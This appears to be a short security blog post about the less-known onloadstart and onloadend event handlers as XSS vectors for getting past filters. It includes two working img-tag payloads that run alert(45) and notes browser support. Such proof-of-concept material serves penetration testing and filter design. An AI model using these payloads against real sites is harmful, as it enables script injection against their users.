Hi hackers. Last time I wrote about onpointer * xss, I write a not well-known event-handle for xss now. (https://www.hahwul.com/2019/07/onpoint-xss-payload-for-bypass-xss-protection.html)

onload* event handler for XSS

it’s onload* handler! Handlers that usually start with onload are well known, but onloadstart and onloadend are not well known.

<!-- onloadstart -->

<!-- Any browser, but not use <img> tag.. -->
<img src="https://1.bp.blogspot.com/-VkTsdecsLiI/XQOmG8rqvyI/AAAAAAAAEPk/9XBkwoAfmXE1KSHlqwF5cROFfgxUtDF_gCLcBGAs/s640/hahwul.gif" onloadstart="alert(45)">

<!-- onloadend -->

<!-- only firefox -->
<img src="https://1.bp.blogspot.com/-VkTsdecsLiI/XQOmG8rqvyI/AAAAAAAAEPk/9XBkwoAfmXE1KSHlqwF5cROFfgxUtDF_gCLcBGAs/s640/hahwul.gif" onloadend="alert(45)">

onloadstar tested my site. it’s work!

But, just only in Firefox.

for XSpear

add eventhandler pattern! https://github.com/hahwul/XSpear/issues/18

You’re welcome(img refer giphy.com)